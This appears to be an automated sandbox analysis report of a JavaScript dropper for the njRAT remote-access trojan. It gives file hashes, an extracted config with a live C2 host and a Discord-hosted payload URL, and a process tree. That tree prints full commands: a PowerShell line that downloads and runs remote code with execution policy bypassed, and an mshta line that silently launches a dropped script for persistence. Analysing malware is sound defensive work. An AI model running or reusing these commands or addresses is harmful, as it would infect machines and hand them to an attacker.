Overview

overview

10

Static

static

34ce23e0ca...436.js

windows7_x64

10

34ce23e0ca...436.js

windows10_x64

10

Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    01-12-2021 17:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    34ce23e0cac1eb85e253f52b87c53436.js

  • Size

    256B

  • MD5

    34ce23e0cac1eb85e253f52b87c53436

  • SHA1

    fbc026960fc1009eae89f7506276a5e153ec58ec

  • SHA256

    ba2680549e33524c3b96c4b2be01c47297e977fe7532034936d8baa4f6dc3104

  • SHA512

    488b7d7cc0a3a723273f4bac17f4b45daa9c894d03af15b6c14e84d9f9b4ee3fa7d263b03fb3c12c78361a4a9d92b77a6e7a25e323b9494e937ba1ca6be92c9d

Score
10/10
njratnyan catsuricatatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

yuni2022.duckdns.org:2000

Mutex

4ab2234479534

Attributes
  • reg_key

    4ab2234479534

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\34ce23e0cac1eb85e253f52b87c53436.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3044
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3732
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4240
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:520
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3492

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    fbf00fb02a4149fb06925bc5522a5470

    SHA1

    72c68a75d51d10b26b61563f3ed67c036d29fe54

    SHA256

    52a082767c0d42bcdf76df730ae1238194bd17606909d7acbcc3f2ede829219f

    SHA512

    067eb68fafd49f641e4cdf38217eb34a4c794c2b08508d5896ec4246db096ea06ca4ed7ee393b3c8291d0fd1971c420e81d9226a727631bcdf224dfc623628ed

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    95fdfe508b23a34ff82f222c68197272

    SHA1

    512174da60d11d033c13f037d1b5b0735c92cc54

    SHA256

    c0cc4840174757d5ff795da6bf8ed80be0e01ac2b01af65f36b27e973621aa7b

    SHA512

    60b7d16bd2e3f505892dde1d94e081f2cb5db87f48bdb5e8c5bb9024592c47d1d0c1d182cbdd16fab08396e6dcbe32f4a008ed50e39821bf7d42d1b247bec4f2

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5

    558a8b7b3fdef4ca79110f8cfd126694

    SHA1

    d6e96ca27f701b3f4c24885dacd14c762a9d36b0

    SHA256

    38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

    SHA512

    37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

    Download Submit
  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5

    7f85382953fde20b101039d48673dbd2

    SHA1

    5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

    SHA256

    fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

    SHA512

    6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

    Download Submit
  • C:\Users\Public\myScript.ps1
    MD5

    b7ce758a456d759c9c8d9d165de473bc

    SHA1

    eb07b9f9a21b12945cd461d970b925698183b8f5

    SHA256

    0d44b8e8222a09eecef416a78409757ac190eae8bd7c0ceb2880791eedeec295

    SHA512

    8c239aa579b8e3875a271a730755c8ee2f83ac72b248270090a8bc025850ac2bd81100dac6118935a10ab686f7e295d599ee99a94779446db5b9cc30110cea04

    Download Submit
  • memory/520-177-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-179-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-194-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-164-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-191-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-190-0x0000022EFA870000-0x0000022EFA873000-memory.dmp
    Filesize

    12KB

    Download
  • memory/520-189-0x0000022EFA860000-0x0000022EFA865000-memory.dmp
    Filesize

    20KB

    Download
  • memory/520-184-0x0000022EE23E0000-0x0000022EE23E2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-183-0x0000022EFA926000-0x0000022EFA928000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-161-0x0000000000000000-mapping.dmp
    Download
  • memory/520-175-0x0000022EFA923000-0x0000022EFA925000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-174-0x0000022EFA920000-0x0000022EFA922000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-172-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-163-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-171-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-165-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-167-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-166-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/520-169-0x0000022EE07D0000-0x0000022EE07D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/748-154-0x0000000000000000-mapping.dmp
    Download
  • memory/3044-118-0x0000000000000000-mapping.dmp
    Download
  • memory/3044-119-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-121-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-125-0x000001F2BAA73000-0x000001F2BAA75000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-127-0x000001F2D2E10000-0x000001F2D2E11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3044-122-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-128-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-123-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-120-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-155-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-138-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-137-0x000001F2BAA76000-0x000001F2BAA78000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-136-0x000001F2D2E40000-0x000001F2D2E42000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-126-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-124-0x000001F2BAA70000-0x000001F2BAA72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-135-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-131-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3044-130-0x000001F2D3850000-0x000001F2D3851000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3044-129-0x000001F2B8DA0000-0x000001F2B8DA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3492-193-0x000000000040676E-mapping.dmp
    Download
  • memory/3492-192-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

    Download
  • memory/3492-197-0x0000000005190000-0x0000000005191000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3492-198-0x0000000005780000-0x0000000005781000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3492-200-0x0000000005280000-0x000000000577E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/3732-158-0x0000000000000000-mapping.dmp
    Download
  • memory/4240-160-0x0000022B08468000-0x0000022B08470000-memory.dmp
    Filesize

    32KB

    Download
  • memory/4240-159-0x0000000000000000-mapping.dmp
    Download